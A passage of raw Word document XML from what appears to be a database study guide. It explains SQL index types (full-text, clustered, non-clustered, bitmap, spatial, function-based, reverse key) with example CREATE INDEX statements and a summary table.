          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A combination of the UNIQUE and COMPOSITE index types, a unique composite index ensures the uniqueness of values across a combination of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD49048"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAFFA24"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Enforces uniqueness across multiple columns, not just one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C04B5"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Used when a combination of columns must be unique across the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED4E1F"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DAE836"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UNIQUE INDEX idx_employee_name_department ON Employee (emp_name, department_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B2587"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6. Full-Text Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB7193"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A full-text index is used for full-text searches on text-based columns. It allows you to perform efficient searches for words or phrases in text columns (such as articles, blogs, or comments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3103D2"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C6CF4"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Used for searching large text columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C8210"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Works by creating an index of words and phrases, making search operations faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E368D35"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upports advanced features like searching for specific words or phrases, wildcard searches, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD40B97"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACD5175"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FULLTEXT INDEX idx_employee_description ON Employee (emp_description);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAD8C8"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7. Clustered Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B646B"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A clustered index determines the physical order of data in the table. It is created automatically when you define a primary key or unique constraint on a table. A table can only have one clustered index because the data can only be sorted in one way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE84F10"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442DEBC2"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The table’s data is physically sorted and stored on disk based on the clustered index key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA4E3D"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A table can have only one clustered index, and it is typically created on the primary key column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76584F0D"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DD9E35"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n most databases, a primary key automatically creates a clustered index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350B3417"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8. Non-Clustered Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA3239"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A non-clustered index is an index that creates a separate structure from the data in the table. It stores a pointer to the actual table rows, and you can have multiple non-clustered indexes on a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C55C59"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3874792E"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The index is separate from the actual table data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6759B20D"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lastRenderedPageBreak/>
        <w:t>Can be created on any column(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77107C7A"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You can have multiple non-clustered indexes on a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8459C4"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674A160"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NONCLUSTERED INDEX idx_employee_name ON Employee (emp_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FAC4E"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9. Bitmap Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861EA4E"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A bitmap index is used for columns that have a low cardinality (i.e., a small number of distinct values). It stores a bitmap for each distinct value in the indexed column and is most effective for columns with a limited set of distinct values, such as gender or status flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F666E21"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079BBFE2"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Works well for columns with low cardinality (few distinct values).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1CF70C"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Very efficient for AND, OR, and NOT operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E7F2B"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A17F8C"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BITMAP INDEX idx_employee_status ON Employee (status);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6D90D"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10. Spatial Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1B497"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A spatial index is used to optimize spatial queries, typically for geographic data (e.g., latitude and longitude) stored in spatial columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDA0223"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F90C72A"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Optimizes queries involving spatial data types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003576EB"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Used for GIS (Geographical Information System) applications and other spatial data queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1FD4FD"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463AA98E"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SPATIAL INDEX idx_location ON Employee (location);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538784ED"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11. Function-Based Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110357DC"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A function-based index allows you to create an index on the result of a function or expression applied to one or more columns. This is useful when you need to index computed values or expressions frequently used in queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484E4BA4"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB8BFAC"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The index is based on the result of a function or expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E154F"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mproves performance when the query frequently uses the function or expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA439DD"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C95AD"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INDEX idx_lower_name ON Employee (LOWER(emp_name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4316BEC7"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12. Reverse Key Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1A338"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A reverse key index reverses the byte order of the key values in the index, which can help avoid hot spots in certain applications where values are sequential (e.g., sequential numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF8DC3"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE3354"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Reverses the bytes of the indexed column values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833EDEA" w14:textId="77777777" w:rsidR="0049473E" w:rsidRPr="0085313D" w:rsidRDefault="0049473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Helps avoid index block contention in certain applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B0007"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717CD419"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INDEX idx_rev_emp_id ON Employee (REVERSE(emp_id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE1AED4"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Summary of Index Typ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3"/>
        <w:gridCol w:w="4330"/>
        <w:gridCol w:w="4201"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="24EA110B" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58FCDCA5"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Index Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77A999C7"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Characteristics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="407D6074"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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="31DC4FBE" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="429C90BD"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Primary Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B696FEA"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Automatically created with a primary key, ensures uniqueness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66F721E6"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PRIMARY KEY (emp_id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="672CF6AA" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BEC0808"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Unique Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58FD1D35"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Ensures uniqueness for a column or combination of columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01564F4D"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UNIQUE INDEX idx_email ON Employee (email)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="0EDDFE7C" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42FFD2B7"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Non-Unique Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B439E8E"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peeds up query performance but allows duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C2692E4"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INDEX idx_name ON Employee (name)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="36B23D79" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7578A3B9"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omposite Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302DF7C1"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d on multiple columns for queries with multiple conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E867137"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INDEX idx_name_salary ON Employee (name, salary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="2C8F6449" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EED1369"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Full-Text Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="180E95CA"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Optimizes full-text searches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02951691"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FULLTEXT INDEX idx_text ON Employee (description)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="7CC7F260" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1407136D"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lustered Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E80EAFA"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Defines the physical order of data in a table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62C3635E"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Automatically created for PRIMARY KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="4FA4621E" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DAA35ED"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Non-Clustered Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25E3920D"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ndex is separate from the table data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2666C51B"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NONCLUSTERED INDEX idx_name ON Employee (name)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="70F252FC" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7054F369"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lastRenderedPageBreak/>
              <w:t>Bitmap Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="060AED2C"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Best for low cardinality columns (few distinct values)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C39655B"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BITMAP INDEX idx_status ON Employee (status)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="4C22CB6B" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B66825D"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Spatial Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A3E427"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Optimizes queries for geographic/spatial data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1874991E"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SPATIAL INDEX idx_location ON Employee (location)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="48E101DE" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE2B890"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Function-Based Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DCF4D59"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ndexes a function or expression applied to a column</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D70B81"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INDEX idx_lower_name ON Employee (LOWER(name))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="0481E3DE" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B118FB7"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Reverse Key Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC35929"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Reverses byte order to avoid contention in sequential data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4040797F"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EATE INDEX idx_rev_id ON Employee (REVERSE(id))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="060F7041"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ndexes are critical to query performance, and choosing the right type for your use case is key to optimizing the performance of your database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1737C3BC" w14:textId="0D1B6423" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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ACE72EA">
          <v:rect id="_x0000_i3004" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBB077" w14:textId="4D157826" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="000960BA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="724" w:name="_Toc196308204"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain different types of </w:t>
      </w:r>
      <w:r w:rsidR="00117BFF" w:rsidRPr="00CE4B95">
        <w:rPr>
